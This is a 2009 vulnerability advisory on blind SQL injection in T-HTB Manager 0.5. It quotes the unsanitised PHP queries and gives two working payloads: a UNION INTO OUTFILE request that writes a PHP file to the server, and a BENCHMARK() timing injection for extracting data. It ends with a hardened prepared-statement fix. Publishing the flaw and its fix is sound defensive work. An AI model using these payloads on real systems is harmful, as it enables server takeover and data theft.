From:Salvatore "drosophila" Fresta <drosophilaxxx_(at)_gmail.com>
Date:10.09.2009
Subject:T-HTB Manager Multiple Blind SQL Injection

********   Salvatore "drosophila" Fresta   ********

[+] Application: T-HTB Manager
[+] Version: 0.5
[+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_Page

[+] Bugs: [A] Multiple Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Sep 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: index.php

Request parameters reach the SQL queries in this script without any
sanitization, but no query output is reflected in the response, so the
injection is blind.

...

    case 'delete_category':
      $id = $_GET['id'];                       // unsanitized, concatenated into SQL below
      $id_interfaces = $_GET['id_interfaces'];

      if($id>0)                                // a leading-numeric string such as "1' UNION ..." passes this test
      {
        $query = "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";
        $db_query = mysql_query($query);

...

    case 'update_category':
      $name = $_POST['name'];                  // unsanitized
      $id = $_POST['id'];                      // unsanitized

      $rate     = $_POST['rate'];
      $ceil     = $_POST['ceil'];
      $burst    = $_POST['burst'];
      $prio     = $_POST['prio'];
      $monitor  = $_POST['monitor'];

      if(strlen($name)>0 && $id>0)
      {
        $nodelft = $_POST['nodelft'];

        $lft = $_POST['lft'];
        $rgt = $_POST['rgt'];

        $query = "UPDATE ".$table_name." set name='" . $name . "' ,  lft='" . $lft . "' , rgt = '" .
                 $rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio
                 . "', monitor = '" . $monitor . "' WHERE id='" . $id . "'";

...

Other cases in the same switch follow the same pattern.


***************************************************

[+] Code


- [A] Multiple Blind SQL Injection

This is a blind SQL injection: nothing from the query is echoed
back, and the database holds no particularly sensitive data such
as usernames or passwords. The more interesting use is writing an
arbitrary file on the server through INTO OUTFILE, which only works
when the MySQL account used by the application has the FILE
privilege, secure_file_priv (if set) allows the destination
directory, mysqld can write there, and the file does not already
exist. The UNION supplies two columns to match rgt, lft, and the
original query's closing quote terminates the injected path, so the
payload leaves it open:

http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO OUTFILE '/tmp/file.php

Send the following as the body of a POST request. WHERE 1=0 keeps
the UPDATE from touching any row, %23 (#) comments out the rest of
the original statement, and the IF() condition is a tautology, so a
response delayed by BENCHMARK() confirms the injection; swapping in
a condition on real data turns it into an extraction oracle:

action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23


***************************************************

[+] Fix

No fix available at the time of writing. Every case above
concatenates request parameters straight into SQL; casting the
numeric ones with intval() and binding the rest as prepared-statement
parameters closes them.
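As an added example, not T-HTB Manager's own code, here are the two cases quoted in the Bugs section rewritten so that no request parameter is ever concatenated into SQL. It assumes $mysqli is an open mysqli connection (with mysqlnd, for get_result()), that $table_name is a hard-coded trusted table name, and guesses the column types (id, lft and rgt integers, the HTB fields free text); with bound parameters a wrong guess only affects coercion, not injection.

```php
<?php
// Added example (not the project's code): hardened delete_category and
// update_category. Assumptions: $mysqli is a live mysqli connection,
// $table_name never comes from the request, column types are guessed.

function delete_category(mysqli $mysqli, string $table_name, array $get): ?array
{
    $id = intval($get['id'] ?? 0);      // "1' UNION ..." becomes plain 1
    if ($id <= 0) {
        return null;
    }
    $stmt = $mysqli->prepare("SELECT rgt, lft FROM `$table_name` WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

function update_category(mysqli $mysqli, string $table_name, array $post): int
{
    $name = trim((string)($post['name'] ?? ''));
    $id   = intval($post['id'] ?? 0);
    if ($name === '' || $id <= 0) {
        return 0;
    }
    // Nested-set bounds are integers; the HTB parameters are passed through
    // as strings but only ever as bound values, never as SQL text.
    $lft     = intval($post['lft'] ?? 0);
    $rgt     = intval($post['rgt'] ?? 0);
    $rate    = (string)($post['rate'] ?? '');
    $ceil    = (string)($post['ceil'] ?? '');
    $burst   = (string)($post['burst'] ?? '');
    $prio    = (string)($post['prio'] ?? '');
    $monitor = (string)($post['monitor'] ?? '');

    $stmt = $mysqli->prepare(
        "UPDATE `$table_name` SET name = ?, lft = ?, rgt = ?, rate = ?, ceil = ?, "
        . "burst = ?, prio = ?, monitor = ? WHERE id = ?"
    );
    // One type letter per placeholder: s = string, i = integer.
    $stmt->bind_param('siisssssi', $name, $lft, $rgt, $rate, $ceil, $burst, $prio, $monitor, $id);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

// Wiring that mirrors the original switch (connection details assumed):
// $mysqli = new mysqli('localhost', 'thtb', 'secret', 'thtb');
// $row = delete_category($mysqli, 'categories', $_GET);
// $n   = update_category($mysqli, 'categories', $_POST);
```

The payloads from the Code section become harmless under this version: the delete_category id collapses to 1 and the update_category name is stored verbatim as a string value. The fix does not depend on magic_quotes_gpc, which was removed in PHP 5.4 anyway.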


***************************************************
